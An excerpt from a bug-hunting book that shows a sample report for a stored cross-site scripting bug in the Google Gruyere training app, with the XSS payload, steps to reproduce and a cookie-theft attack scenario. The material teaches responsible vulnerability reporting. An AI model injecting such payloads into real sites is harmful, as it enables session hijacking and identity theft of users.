- Hands-On Bug Hunting for Penetration Testers
- Joseph Marshall
- 217字
- 2021-07-16 17:53:17
Attack Scenario
Coming up with a good attack scenario isn't as necessary as the previous data points, but can be a great method for increasing the bug's severity and boosting your payout.
For this attack, we'll highlight the extent of the damage beyond just the Gruyere app. If an attacker could execute arbitrary JavaScript from a stored XSS bug, they could exfiltrate sensitive cookies, such as those for authenticating financial apps (banks, brokers, and crypto traders) or social networks (Twitter, Facebook, Instagram), which could in turn be used for identity theft, credit card fraud, and other cyber crimes.
Here's how our report will look:
CATEGORY: Persistent / Stored XSS
TIME: 1:12 AM (1:12) UTC
URL: https://google-gruyere.appspot.com/09809809887686765654654/newsnippet.gtl
PAYLOAD: <a onmouseover="alert(document.cookie)">xxs link</a>
METHODOLOGY: XSS payload submitted manually
INSTRUCTIONS TO REPRODUCE:
1. Navigate to "New Snippet" submission page
2. Enter the XSS payload into the "New Snippet" form.
3. Click "Submit" and create a new snippet.
4. The malicious XSS contained in the payload is executed whenever someone hovers over the snippet with that link.
ATTACK SCENARIO:
With a persistent XSS vulnerability to exploit, a malicious actor could exfiltrate sensitive cookies to steal the identity of Gruyere's users, impersonating them both in the app and in whatever other accounts they are logged into at the time of the XSS script's execution.